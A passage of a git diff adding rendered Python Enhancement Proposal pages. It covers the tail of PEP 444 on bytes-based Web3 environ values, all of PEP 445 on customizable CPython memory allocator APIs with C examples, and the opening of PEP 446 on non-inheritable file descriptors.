Such middleware might in the future, instead of drawing an +equivalence between Python 3 str and HTTP byte values, make use +of a yet-to-be-created “ebytes” type (aka “bytes-with-benefits”), +particularly if a String ABC proposal is accepted into the Python +core and implemented.

+
+

Conversely, it is presumed that WSGI 1.0 middleware will be created +which will allow a Web3 application to run behind a WSGI 1.0 stack on +the Python 2 platform.

+
+
+

Environ and Response Values as Bytes

+

Casual middleware and application writers may consider the use of +bytes as environment values and response values inconvenient. In +particular, they won’t be able to use common string formatting +functions such as ('%s' % bytes_val) or +bytes_val.format('123') because bytes don’t have the same API as +strings on platforms such as Python 3 where the two types differ. +Likewise, on such platforms, stdlib HTTP-related API support for using +bytes interchangeably with text can be spotty. In places where bytes +are inconvenient or incompatible with library APIs, middleware and +application writers will have to decode such bytes to text explicitly. +This is particularly inconvenient for middleware writers: to work with +environment values as strings, they’ll have to decode them from an +implied encoding and if they need to mutate an environ value, they’ll +then need to encode the value into a byte stream before placing it +into the environ. While the use of bytes by the specification as +environ values might be inconvenient for casual developers, it +provides several benefits.

+

Using bytes types to represent HTTP and server values to an +application most closely matches reality because HTTP is fundamentally +a bytes-oriented protocol. If the environ values are mandated to be +strings, each server will need to use heuristics to guess about the +encoding of various values provided by the HTTP environment. Using +all strings might increase casual middleware writer convenience, but +will also lead to ambiguity and confusion when a value cannot be +decoded to a meaningful non-surrogate string.

+

Use of bytes as environ values avoids any potential for the need for +the specification to mandate that a participating server be informed +of encoding configuration parameters. If environ values are treated +as strings, and so must be decoded from bytes, configuration +parameters may eventually become necessary as policy clues from the +application deployer. Such a policy would be used to guess an +appropriate decoding strategy in various circumstances, effectively +placing the burden for enforcing a particular application encoding +policy upon the server. If the server must serve more than one +application, such configuration would quickly become complex. Many +policies would also be impossible to express declaratively.

+

In reality, HTTP is a complicated and legacy-fraught protocol which +requires a complex set of heuristics to make sense of. It would be +nice if we could allow this protocol to protect us from this +complexity, but we cannot do so reliably while still providing to +application writers a level of control commensurate with reality. +Python applications must often deal with data embedded in the +environment which not only must be parsed by legacy heuristics, but +does not conform even to any existing HTTP specification. While +these eventualities are unpleasant, they crop up with regularity, +making it impossible and undesirable to hide them from application +developers, as application developers are the only people who are able +to decide upon an appropriate action when an HTTP specification +violation is detected.

+

Some have argued for mixed use of bytes and string values as environ +values. This proposal avoids that strategy. Sole use of bytes as +environ values makes it possible to fit this specification entirely in +one’s head; you won’t need to guess about which values are strings and +which are bytes.

+

This protocol would also fit in a developer’s head if all environ +values were strings, but this specification doesn’t use that strategy. +This will likely be the point of greatest contention regarding the use +of bytes. In defense of bytes: developers often prefer protocols with +consistent contracts, even if the contracts themselves are suboptimal. +If we hide encoding issues from a developer until a value that +contains surrogates causes problems after it has already reached +beyond the I/O boundary of their application, they will need to do a +lot more work to fix assumptions made by their application than if we +were to just present the problem much earlier in terms of “here’s some +bytes, you decode them”. This is also a counter-argument to the +“bytes are inconvenient” assumption: while presenting bytes to an +application developer may be inconvenient for a casual application +developer who doesn’t care about edge cases, they are extremely +convenient for the application developer who needs to deal with +complex, dirty eventualities, because use of bytes allows him the +appropriate level of control with a clear separation of +responsibility.

+

If the protocol uses bytes, it is presumed that libraries will be +created to make working with bytes-only in the environ and within +return values more pleasant; for example, analogues of the WSGI 1.0 +libraries named “WebOb” and “Werkzeug”. Such libraries will fill the +gap between convenience and control, allowing the spec to remain +simple and regular while still allowing casual authors a convenient +way to create Web3 middleware and application components. This seems +to be a reasonable alternative to baking encoding policy into the +protocol, because many such libraries can be created independently +from the protocol, and application developers can choose the one that +provides them the appropriate levels of control and convenience for a +particular job.

+

Here are some alternatives to using all bytes:

+
    +
  • Have the server decode all values representing CGI and server +environ values into strings using the latin-1 encoding, which is +lossless. Smuggle any undecodable bytes within the resulting +string.
  • +
  • Encode all CGI and server environ values to strings using the +utf-8 encoding with the surrogateescape error handler. This +does not work under any existing Python 2.
  • +
  • Encode some values into bytes and other values into strings, as +decided by their typical usages.
  • +
+
+
+

Applications Should be Allowed to Read web3.input Past CONTENT_LENGTH

+

At [5], Graham Dumpleton makes the assertion that wsgi.input +should be required to return the empty string as a signifier of +out-of-data, and that applications should be allowed to read past the +number of bytes specified in CONTENT_LENGTH, depending only upon +the empty string as an EOF marker. WSGI relies on an application +“being well behaved and once all data specified by CONTENT_LENGTH +is read, that it processes the data and returns any response. That +same socket connection could then be used for a subsequent request.” +Graham would like WSGI adapters to be required to wrap raw socket +connections: “this wrapper object will need to count how much data has +been read, and when the amount of data reaches that as defined by +CONTENT_LENGTH, any subsequent reads should return an empty string +instead.” This may be useful to support chunked encoding and input +filters.

+
+
+

web3.input Unknown Length

+

There’s no documented way to indicate that there is content in +environ['web3.input'], but the content length is unknown.

+
+
+

read() of web3.input Should Support No-Size Calling Convention

+

At [5], Graham Dumpleton makes the assertion that the read() +method of wsgi.input should be callable without arguments, and +that the result should be “all available request content”. Needs +discussion.

+

Comment Armin: I changed the spec to require that from an +implementation. I had too much pain with that in the past already. +Open for discussions though.

+
+

Input Filters should set environ CONTENT_LENGTH to -1

+

At [5], Graham Dumpleton suggests that an input filter might set +environ['CONTENT_LENGTH'] to -1 to indicate that it mutated the +input.

+
+
+
+

headers as Literal List of Two-Tuples

+

Why do we make applications return a headers structure that is a +literal list of two-tuples? I think the iterability of headers +needs to be maintained while it moves up the stack, but I don’t think +we need to be able to mutate it in place at all times. Could we +loosen that requirement?

+

Comment Armin: Strong yes

+
+
+

Removed Requirement that Middleware Not Block

+

This requirement was removed: “middleware components must not +block iteration waiting for multiple values from an application +iterable. If the middleware needs to accumulate more data from the +application before it can produce any output, it must yield an +empty string.” This requirement existed to support asynchronous +applications and servers (see PEP 333’s “Middleware Handling of Block +Boundaries”). Asynchronous applications are now serviced explicitly +by web3.async capable protocol (a Web3 application callable may +itself return a callable).

+
+
+

web3.script_name and web3.path_info

+

These values are required to be placed into the environment by an +origin server under this specification. Unlike SCRIPT_NAME and +PATH_INFO, these must be the original URL-encoded variants +derived from the request URI. We probably need to figure out how +these should be computed originally, and what their values should be +if the server performs URL rewriting.

+
+
+

Long Response Headers

+

Bob Brewer notes on Web-SIG [6]:

+
+
Each header_value must not include any control characters, +including carriage returns or linefeeds, either embedded or at the +end. (These requirements are to minimize the complexity of any +parsing that must be performed by servers, gateways, and +intermediate response processors that need to inspect or modify +response headers.) (PEP 333)
+

That’s understandable, but HTTP headers are defined as (mostly) +*TEXT, and “words of *TEXT MAY contain characters from character +sets other than ISO-8859-1 only when encoded according to the rules of +RFC 2047.” [2] And RFC 2047 specifies that “an ‘encoded-word’ may +not be more than 75 characters long… If it is desirable to encode +more text than will fit in an ‘encoded-word’ of 75 characters, +multiple ‘encoded-word’s (separated by CRLF SPACE) may be used.” [3] +This satisfies HTTP header folding rules, as well: “Header fields can +be extended over multiple lines by preceding each extra line with at +least one SP or HT.” (PEP 333)

+

So in my reading of HTTP, some code somewhere should introduce +newlines in longish, encoded response header values. I see three +options:

+
    +
  1. Keep things as they are and disallow response header values if they +contain words over 75 chars that are outside the ISO-8859-1 +character set.
  2. +
  3. Allow newline characters in WSGI response headers.
  4. +
  5. Require/strongly suggest WSGI servers to do the encoding and +folding before sending the value over HTTP.
  6. +
+
+
+

Request Trailers and Chunked Transfer Encoding

+

When using chunked transfer encoding on request content, the RFCs +allow there to be request trailers. These are like request headers +but come after the final null data chunk. These trailers are only +available when the chunked data stream is finite length and when it +has all been read in. Neither WSGI nor Web3 currently supports them.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0444.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0445/index.html b/pep-0445/index.html new file mode 100644 index 00000000000..efd1557b5ff --- /dev/null +++ b/pep-0445/index.html @@ -0,0 +1,856 @@ + + + + + + + + PEP 445 – Add new APIs to customize Python memory allocators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 445 – Add new APIs to customize Python memory allocators

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
BDFL-Delegate:
+
Antoine Pitrou <solipsis at pitrou.net>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Jun-2013
+
Python-Version:
+
3.4
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes new Application Programming Interfaces (API) to customize +Python memory allocators. The only implementation required to conform to +this PEP is CPython, but other implementations may choose to be compatible, +or to re-use a similar scheme.

+
+
+

Rationale

+

Use cases:

+
    +
  • Applications embedding Python which want to isolate Python memory from +the memory of the application, or want to use a different memory +allocator optimized for its Python usage
  • +
  • Python running on embedded devices with low memory and slow CPU. +A custom memory allocator can be used for efficiency and/or to get +access all the memory of the device.
  • +
  • Debug tools for memory allocators:
      +
    • track the memory usage (find memory leaks)
    • +
    • get the location of a memory allocation: Python filename and line +number, and the size of a memory block
    • +
    • detect buffer underflow, buffer overflow and misuse of Python +allocator APIs (see Redesign Debug Checks on Memory Block +Allocators as Hooks)
    • +
    • force memory allocations to fail to test handling of the +MemoryError exception
    • +
    +
  • +
+
+
+

Proposal

+
+

New Functions and Structures

+
    +
  • Add a new GIL-free (no need to hold the GIL) memory allocator:
      +
    • void* PyMem_RawMalloc(size_t size)
    • +
    • void* PyMem_RawRealloc(void *ptr, size_t new_size)
    • +
    • void PyMem_RawFree(void *ptr)
    • +
    • The newly allocated memory will not have been initialized in any +way.
    • +
    • Requesting zero bytes returns a distinct non-NULL pointer if +possible, as if PyMem_Malloc(1) had been called instead.
    • +
    +
  • +
  • Add a new PyMemAllocator structure:
    typedef struct {
    +    /* user context passed as the first argument to the 3 functions */
    +    void *ctx;
    +
    +    /* allocate a memory block */
    +    void* (*malloc) (void *ctx, size_t size);
    +
    +    /* allocate or resize a memory block */
    +    void* (*realloc) (void *ctx, void *ptr, size_t new_size);
    +
    +    /* release a memory block */
    +    void (*free) (void *ctx, void *ptr);
    +} PyMemAllocator;
    +
    +
    +
  • +
  • Add a new PyMemAllocatorDomain enum to choose the Python +allocator domain. Domains:
      +
    • PYMEM_DOMAIN_RAW: PyMem_RawMalloc(), PyMem_RawRealloc() +and PyMem_RawFree()
    • +
    • PYMEM_DOMAIN_MEM: PyMem_Malloc(), PyMem_Realloc() and +PyMem_Free()
    • +
    • PYMEM_DOMAIN_OBJ: PyObject_Malloc(), PyObject_Realloc() +and PyObject_Free()
    • +
    +
  • +
  • Add new functions to get and set memory block allocators:
      +
    • void PyMem_GetAllocator(PyMemAllocatorDomain domain, PyMemAllocator *allocator)
    • +
    • void PyMem_SetAllocator(PyMemAllocatorDomain domain, PyMemAllocator *allocator)
    • +
    • The new allocator must return a distinct non-NULL pointer when +requesting zero bytes
    • +
    • For the PYMEM_DOMAIN_RAW domain, the allocator must be +thread-safe: the GIL is not held when the allocator is called.
    • +
    +
  • +
  • Add a new PyObjectArenaAllocator structure:
    typedef struct {
    +    /* user context passed as the first argument to the 2 functions */
    +    void *ctx;
    +
    +    /* allocate an arena */
    +    void* (*alloc) (void *ctx, size_t size);
    +
    +    /* release an arena */
    +    void (*free) (void *ctx, void *ptr, size_t size);
    +} PyObjectArenaAllocator;
    +
    +
    +
  • +
  • Add new functions to get and set the arena allocator used by +pymalloc:
      +
    • void PyObject_GetArenaAllocator(PyObjectArenaAllocator *allocator)
    • +
    • void PyObject_SetArenaAllocator(PyObjectArenaAllocator *allocator)
    • +
    +
  • +
  • Add a new function to reinstall the debug checks on memory allocators when +a memory allocator is replaced with PyMem_SetAllocator():
      +
    • void PyMem_SetupDebugHooks(void)
    • +
    • Install the debug hooks on all memory block allocators. The function can be +called more than once, hooks are only installed once.
    • +
    • The function does nothing is Python is not compiled in debug mode.
    • +
    +
  • +
  • Memory block allocators always return NULL if size is greater than +PY_SSIZE_T_MAX. The check is done before calling the inner +function.
  • +
+
+

Note

+

The pymalloc allocator is optimized for objects smaller than 512 bytes +with a short lifetime. It uses memory mappings with a fixed size of 256 +KB called “arenas”.

+
+

Here is how the allocators are set up by default:

+
    +
  • PYMEM_DOMAIN_RAW, PYMEM_DOMAIN_MEM: malloc(), +realloc() and free(); call malloc(1) when requesting zero +bytes
  • +
  • PYMEM_DOMAIN_OBJ: pymalloc allocator which falls back on +PyMem_Malloc() for allocations larger than 512 bytes
  • +
  • pymalloc arena allocator: VirtualAlloc() and VirtualFree() on +Windows, mmap() and munmap() when available, or malloc() +and free()
  • +
+
+
+

Redesign Debug Checks on Memory Block Allocators as Hooks

+

Since Python 2.3, Python implements different checks on memory +allocators in debug mode:

+
    +
  • Newly allocated memory is filled with the byte 0xCB, freed memory +is filled with the byte 0xDB.
  • +
  • Detect API violations, ex: PyObject_Free() called on a memory +block allocated by PyMem_Malloc()
  • +
  • Detect write before the start of the buffer (buffer underflow)
  • +
  • Detect write after the end of the buffer (buffer overflow)
  • +
+

In Python 3.3, the checks are installed by replacing PyMem_Malloc(), +PyMem_Realloc(), PyMem_Free(), PyObject_Malloc(), +PyObject_Realloc() and PyObject_Free() using macros. The new +allocator allocates a larger buffer and writes a pattern to detect buffer +underflow, buffer overflow and use after free (by filling the buffer with +the byte 0xDB). It uses the original PyObject_Malloc() +function to allocate memory. So PyMem_Malloc() and +PyMem_Realloc() indirectly call PyObject_Malloc() and +PyObject_Realloc().

+

This PEP redesigns the debug checks as hooks on the existing allocators +in debug mode. Examples of call traces without the hooks:

+
    +
  • PyMem_RawMalloc() => _PyMem_RawMalloc() => malloc()
  • +
  • PyMem_Realloc() => _PyMem_RawRealloc() => realloc()
  • +
  • PyObject_Free() => _PyObject_Free()
  • +
+

Call traces when the hooks are installed (debug mode):

+
    +
  • PyMem_RawMalloc() => _PyMem_DebugMalloc() +=> _PyMem_RawMalloc() => malloc()
  • +
  • PyMem_Realloc() => _PyMem_DebugRealloc() +=> _PyMem_RawRealloc() => realloc()
  • +
  • PyObject_Free() => _PyMem_DebugFree() +=> _PyObject_Free()
  • +
+

As a result, PyMem_Malloc() and PyMem_Realloc() now call +malloc() and realloc() in both release mode and debug mode, +instead of calling PyObject_Malloc() and PyObject_Realloc() in +debug mode.

+

When at least one memory allocator is replaced with +PyMem_SetAllocator(), the PyMem_SetupDebugHooks() function must +be called to reinstall the debug hooks on top on the new allocator.

+
+
+

Don’t call malloc() directly anymore

+

PyObject_Malloc() falls back on PyMem_Malloc() instead of +malloc() if size is greater or equal than 512 bytes, and +PyObject_Realloc() falls back on PyMem_Realloc() instead of +realloc()

+

Direct calls to malloc() are replaced with PyMem_Malloc(), or +PyMem_RawMalloc() if the GIL is not held.

+

External libraries like zlib or OpenSSL can be configured to allocate memory +using PyMem_Malloc() or PyMem_RawMalloc(). If the allocator of a +library can only be replaced globally (rather than on an object-by-object +basis), it shouldn’t be replaced when Python is embedded in an application.

+

For the “track memory usage” use case, it is important to track memory +allocated in external libraries to have accurate reports, because these +allocations can be large (e.g. they can raise a MemoryError exception) +and would otherwise be missed in memory usage reports.

+
+
+
+

Examples

+
+

Use case 1: Replace Memory Allocators, keep pymalloc

+

Dummy example wasting 2 bytes per memory block, +and 10 bytes per pymalloc arena:

+
#include <stdlib.h>
+
+size_t alloc_padding = 2;
+size_t arena_padding = 10;
+
+void* my_malloc(void *ctx, size_t size)
+{
+    int padding = *(int *)ctx;
+    return malloc(size + padding);
+}
+
+void* my_realloc(void *ctx, void *ptr, size_t new_size)
+{
+    int padding = *(int *)ctx;
+    return realloc(ptr, new_size + padding);
+}
+
+void my_free(void *ctx, void *ptr)
+{
+    free(ptr);
+}
+
+void* my_alloc_arena(void *ctx, size_t size)
+{
+    int padding = *(int *)ctx;
+    return malloc(size + padding);
+}
+
+void my_free_arena(void *ctx, void *ptr, size_t size)
+{
+    free(ptr);
+}
+
+void setup_custom_allocator(void)
+{
+    PyMemAllocator alloc;
+    PyObjectArenaAllocator arena;
+
+    alloc.ctx = &alloc_padding;
+    alloc.malloc = my_malloc;
+    alloc.realloc = my_realloc;
+    alloc.free = my_free;
+
+    PyMem_SetAllocator(PYMEM_DOMAIN_RAW, &alloc);
+    PyMem_SetAllocator(PYMEM_DOMAIN_MEM, &alloc);
+    /* leave PYMEM_DOMAIN_OBJ unchanged, use pymalloc */
+
+    arena.ctx = &arena_padding;
+    arena.alloc = my_alloc_arena;
+    arena.free = my_free_arena;
+    PyObject_SetArenaAllocator(&arena);
+
+    PyMem_SetupDebugHooks();
+}
+
+
+
+
+

Use case 2: Replace Memory Allocators, override pymalloc

+

If you have a dedicated allocator optimized for allocations of objects +smaller than 512 bytes with a short lifetime, pymalloc can be overridden +(replace PyObject_Malloc()).

+

Dummy example wasting 2 bytes per memory block:

+
#include <stdlib.h>
+
+size_t padding = 2;
+
+void* my_malloc(void *ctx, size_t size)
+{
+    int padding = *(int *)ctx;
+    return malloc(size + padding);
+}
+
+void* my_realloc(void *ctx, void *ptr, size_t new_size)
+{
+    int padding = *(int *)ctx;
+    return realloc(ptr, new_size + padding);
+}
+
+void my_free(void *ctx, void *ptr)
+{
+    free(ptr);
+}
+
+void setup_custom_allocator(void)
+{
+    PyMemAllocator alloc;
+    alloc.ctx = &padding;
+    alloc.malloc = my_malloc;
+    alloc.realloc = my_realloc;
+    alloc.free = my_free;
+
+    PyMem_SetAllocator(PYMEM_DOMAIN_RAW, &alloc);
+    PyMem_SetAllocator(PYMEM_DOMAIN_MEM, &alloc);
+    PyMem_SetAllocator(PYMEM_DOMAIN_OBJ, &alloc);
+
+    PyMem_SetupDebugHooks();
+}
+
+
+

The pymalloc arena does not need to be replaced, because it is no more +used by the new allocator.

+
+
+

Use case 3: Setup Hooks On Memory Block Allocators

+

Example to setup hooks on all memory block allocators:

+
struct {
+    PyMemAllocator raw;
+    PyMemAllocator mem;
+    PyMemAllocator obj;
+    /* ... */
+} hook;
+
+static void* hook_malloc(void *ctx, size_t size)
+{
+    PyMemAllocator *alloc = (PyMemAllocator *)ctx;
+    void *ptr;
+    /* ... */
+    ptr = alloc->malloc(alloc->ctx, size);
+    /* ... */
+    return ptr;
+}
+
+static void* hook_realloc(void *ctx, void *ptr, size_t new_size)
+{
+    PyMemAllocator *alloc = (PyMemAllocator *)ctx;
+    void *ptr2;
+    /* ... */
+    ptr2 = alloc->realloc(alloc->ctx, ptr, new_size);
+    /* ... */
+    return ptr2;
+}
+
+static void hook_free(void *ctx, void *ptr)
+{
+    PyMemAllocator *alloc = (PyMemAllocator *)ctx;
+    /* ... */
+    alloc->free(alloc->ctx, ptr);
+    /* ... */
+}
+
+void setup_hooks(void)
+{
+    PyMemAllocator alloc;
+    static int installed = 0;
+
+    if (installed)
+        return;
+    installed = 1;
+
+    alloc.malloc = hook_malloc;
+    alloc.realloc = hook_realloc;
+    alloc.free = hook_free;
+    PyMem_GetAllocator(PYMEM_DOMAIN_RAW, &hook.raw);
+    PyMem_GetAllocator(PYMEM_DOMAIN_MEM, &hook.mem);
+    PyMem_GetAllocator(PYMEM_DOMAIN_OBJ, &hook.obj);
+
+    alloc.ctx = &hook.raw;
+    PyMem_SetAllocator(PYMEM_DOMAIN_RAW, &alloc);
+
+    alloc.ctx = &hook.mem;
+    PyMem_SetAllocator(PYMEM_DOMAIN_MEM, &alloc);
+
+    alloc.ctx = &hook.obj;
+    PyMem_SetAllocator(PYMEM_DOMAIN_OBJ, &alloc);
+}
+
+
+
+

Note

+

PyMem_SetupDebugHooks() does not need to be called because +memory allocator are not replaced: the debug checks on memory +block allocators are installed automatically at startup.

+
+
+
+
+

Performances

+

The implementation of this PEP (issue #3329) has no visible overhead on +the Python benchmark suite.

+

Results of the Python benchmarks suite (-b 2n3): some tests are 1.04x +faster, some tests are 1.04 slower. Results of pybench microbenchmark: +“+0.1%” slower globally (diff between -4.9% and +5.6%).

+

The full output of benchmarks is attached to the issue #3329.

+
+
+

Rejected Alternatives

+
+

More specific functions to get/set memory allocators

+

It was originally proposed a larger set of C API functions, with one pair +of functions for each allocator domain:

+
    +
  • void PyMem_GetRawAllocator(PyMemAllocator *allocator)
  • +
  • void PyMem_GetAllocator(PyMemAllocator *allocator)
  • +
  • void PyObject_GetAllocator(PyMemAllocator *allocator)
  • +
  • void PyMem_SetRawAllocator(PyMemAllocator *allocator)
  • +
  • void PyMem_SetAllocator(PyMemAllocator *allocator)
  • +
  • void PyObject_SetAllocator(PyMemAllocator *allocator)
  • +
+

This alternative was rejected because it is not possible to write +generic code with more specific functions: code must be duplicated for +each memory allocator domain.

+
+
+

Make PyMem_Malloc() reuse PyMem_RawMalloc() by default

+

If PyMem_Malloc() called PyMem_RawMalloc() by default, +calling PyMem_SetAllocator(PYMEM_DOMAIN_RAW, alloc) would also +patch PyMem_Malloc() indirectly.

+

This alternative was rejected because PyMem_SetAllocator() would +have a different behaviour depending on the domain. Always having the +same behaviour is less error-prone.

+
+
+

Add a new PYDEBUGMALLOC environment variable

+

It was proposed to add a new PYDEBUGMALLOC environment variable to +enable debug checks on memory block allocators. It would have had the same +effect as calling the PyMem_SetupDebugHooks(), without the need +to write any C code. Another advantage is to allow to enable debug checks +even in release mode: debug checks would always be compiled in, but only +enabled when the environment variable is present and non-empty.

+

This alternative was rejected because a new environment variable would +make Python initialization even more complex. PEP 432 +tries to simplify the +CPython startup sequence.

+
+
+

Use macros to get customizable allocators

+

To have no overhead in the default configuration, customizable +allocators would be an optional feature enabled by a configuration +option or by macros.

+

This alternative was rejected because the use of macros implies having +to recompile extensions modules to use the new allocator and allocator +hooks. Not having to recompile Python nor extension modules makes debug +hooks easier to use in practice.

+
+
+

Pass the C filename and line number

+

Define allocator functions as macros using __FILE__ and __LINE__ +to get the C filename and line number of a memory allocation.

+

Example of PyMem_Malloc macro with the modified +PyMemAllocator structure:

+
typedef struct {
+    /* user context passed as the first argument
+       to the 3 functions */
+    void *ctx;
+
+    /* allocate a memory block */
+    void* (*malloc) (void *ctx, const char *filename, int lineno,
+                     size_t size);
+
+    /* allocate or resize a memory block */
+    void* (*realloc) (void *ctx, const char *filename, int lineno,
+                      void *ptr, size_t new_size);
+
+    /* release a memory block */
+    void (*free) (void *ctx, const char *filename, int lineno,
+                  void *ptr);
+} PyMemAllocator;
+
+void* _PyMem_MallocTrace(const char *filename, int lineno,
+                         size_t size);
+
+/* the function is still needed for the Python stable ABI */
+void* PyMem_Malloc(size_t size);
+
+#define PyMem_Malloc(size) \
+        _PyMem_MallocTrace(__FILE__, __LINE__, size)
+
+
+

The GC allocator functions would also have to be patched. For example, +_PyObject_GC_Malloc() is used in many C functions and so objects of +different types would have the same allocation location.

+

This alternative was rejected because passing a filename and a line +number to each allocator makes the API more complex: pass 3 new +arguments (ctx, filename, lineno) to each allocator function, instead of +just a context argument (ctx). Having to also modify GC allocator +functions adds too much complexity for a little gain.

+
+
+

GIL-free PyMem_Malloc()

+

In Python 3.3, when Python is compiled in debug mode, PyMem_Malloc() +indirectly calls PyObject_Malloc() which requires the GIL to be +held (it isn’t thread-safe). That’s why PyMem_Malloc() must be called +with the GIL held.

+

This PEP changes PyMem_Malloc(): it now always calls malloc() +rather than PyObject_Malloc(). The “GIL must be held” restriction +could therefore be removed from PyMem_Malloc().

+

This alternative was rejected because allowing to call +PyMem_Malloc() without holding the GIL can break applications +which setup their own allocators or allocator hooks. Holding the GIL is +convenient to develop a custom allocator: no need to care about other +threads. It is also convenient for a debug allocator hook: Python +objects can be safely inspected, and the C API may be used for reporting.

+

Moreover, calling PyGILState_Ensure() in a memory allocator has +unexpected behaviour, especially at Python startup and when creating of a +new Python thread state. It is better to free custom allocators of +the responsibility of acquiring the GIL.

+
+
+

Don’t add PyMem_RawMalloc()

+

Replace malloc() with PyMem_Malloc(), but only if the GIL is +held. Otherwise, keep malloc() unchanged.

+

The PyMem_Malloc() is used without the GIL held in some Python +functions. For example, the main() and Py_Main() functions of +Python call PyMem_Malloc() whereas the GIL do not exist yet. In this +case, PyMem_Malloc() would be replaced with malloc() (or +PyMem_RawMalloc()).

+

This alternative was rejected because PyMem_RawMalloc() is required +for accurate reports of the memory usage. When a debug hook is used to +track the memory usage, the memory allocated by direct calls to +malloc() cannot be tracked. PyMem_RawMalloc() can be hooked and +so all the memory allocated by Python can be tracked, including +memory allocated without holding the GIL.

+
+
+

Use existing debug tools to analyze memory use

+

There are many existing debug tools to analyze memory use. Some +examples: Valgrind, Purify, Clang AddressSanitizer, failmalloc, etc.

+

The problem is to retrieve the Python object related to a memory pointer +to read its type and/or its content. Another issue is to retrieve the +source of the memory allocation: the C backtrace is usually useless +(same reasoning than macros using __FILE__ and __LINE__, see +Pass the C filename and line number), the Python filename and line +number (or even the Python traceback) is more useful.

+

This alternative was rejected because classic tools are unable to +introspect Python internals to collect such information. Being able to +setup a hook on allocators called with the GIL held allows to collect a +lot of useful data from Python internals.

+
+
+

Add a msize() function

+

Add another function to PyMemAllocator and +PyObjectArenaAllocator structures:

+
size_t msize(void *ptr);
+
+
+

This function returns the size of a memory block or a memory mapping. +Return (size_t)-1 if the function is not implemented or if the pointer +is unknown (ex: NULL pointer).

+

On Windows, this function can be implemented using _msize() and +VirtualQuery().

+

The function can be used to implement a hook tracking the memory usage. +The free() method of an allocator only gets the address of a memory +block, whereas the size of the memory block is required to update the +memory usage.

+

The additional msize() function was rejected because only few +platforms implement it. For example, Linux with the GNU libc does not +provide a function to get the size of a memory block. msize() is not +currently used in the Python source code. The function would only be +used to track memory use, and make the API more complex. A debug hook +can implement the function internally, there is no need to add it to +PyMemAllocator and PyObjectArenaAllocator structures.

+
+
+

No context argument

+

Simplify the signature of allocator functions, remove the context +argument:

+
    +
  • void* malloc(size_t size)
  • +
  • void* realloc(void *ptr, size_t new_size)
  • +
  • void free(void *ptr)
  • +
+

It is likely for an allocator hook to be reused for +PyMem_SetAllocator() and PyObject_SetAllocator(), or even +PyMem_SetRawAllocator(), but the hook must call a different function +depending on the allocator. The context is a convenient way to reuse the +same custom allocator or hook for different Python allocators.

+

In C++, the context can be used to pass this.

+
+
+
+

External Libraries

+

Examples of API used to customize memory allocators.

+

Libraries used by Python:

+ +

Other libraries:

+ +

The new ctx parameter of this PEP was inspired by the API of zlib and +Oracle’s OCI libraries.

+

See also the GNU libc: Memory Allocation Hooks +which uses a different approach to hook memory allocators.

+
+
+

Memory Allocators

+

The C standard library provides the well known malloc() function. +Its implementation depends on the platform and of the C library. The GNU +C library uses a modified ptmalloc2, based on “Doug Lea’s Malloc” +(dlmalloc). FreeBSD uses jemalloc. Google provides tcmalloc which +is part of gperftools.

+

malloc() uses two kinds of memory: heap and memory mappings. Memory +mappings are usually used for large allocations (ex: larger than 256 +KB), whereas the heap is used for small allocations.

+

On UNIX, the heap is handled by brk() and sbrk() system calls, +and it is contiguous. On Windows, the heap is handled by +HeapAlloc() and can be discontiguous. Memory mappings are handled by +mmap() on UNIX and VirtualAlloc() on Windows, they can be +discontiguous.

+

Releasing a memory mapping gives back immediately the memory to the +system. On UNIX, the heap memory is only given back to the system if the +released block is located at the end of the heap. Otherwise, the memory +will only be given back to the system when all the memory located after +the released memory is also released.

+

To allocate memory on the heap, an allocator tries to reuse free space. +If there is no contiguous space big enough, the heap must be enlarged, +even if there is more free space than required size. This issue is +called the “memory fragmentation”: the memory usage seen by the system +is higher than real usage. On Windows, HeapAlloc() creates +a new memory mapping with VirtualAlloc() if there is not enough free +contiguous memory.

+

CPython has a pymalloc allocator for allocations smaller than 512 +bytes. This allocator is optimized for small objects with a short +lifetime. It uses memory mappings called “arenas” with a fixed size of +256 KB.

+

Other allocators:

+ +

This PEP allows to choose exactly which memory allocator is used for your +application depending on its usage of the memory (number of allocations, +size of allocations, lifetime of objects, etc.).

+
+ + +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0445.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0446/index.html b/pep-0446/index.html new file mode 100644 index 00000000000..df0dd4c37fb --- /dev/null +++ b/pep-0446/index.html @@ -0,0 +1,741 @@ + + + + + + + + PEP 446 – Make newly created file descriptors non-inheritable | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 446 – Make newly created file descriptors non-inheritable

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
05-Aug-2013
+
Python-Version:
+
3.4
+
Replaces:
+
433
+
+
+
+
Table of Contents +
+
+

Abstract

+

Leaking file descriptors in child processes causes various annoying +issues and is a known major security vulnerability. Using the +subprocess module with the close_fds parameter set to True is +not possible in all cases.

+

This PEP proposes to make all file descriptors created by Python +non-inheritable by default to reduce the risk of these issues. This PEP +fixes also a race condition in multi-threaded applications on operating +systems supporting atomic flags to create non-inheritable file +descriptors.

+

We are aware of the code breakage this is likely to cause, and doing it +anyway for the good of mankind. (Details in the section “Backward +Compatibility” below.)

+
+
+

Rationale

+
+

Inheritance of File Descriptors

+

Each operating system handles the inheritance of file descriptors +differently. Windows creates non-inheritable handles by default, whereas +UNIX and the POSIX API on Windows create inheritable file descriptors by +default. Python prefers the POSIX API over the native Windows API, to +have a single code base and to use the same type for file descriptors, +and so it creates inheritable file descriptors.

+

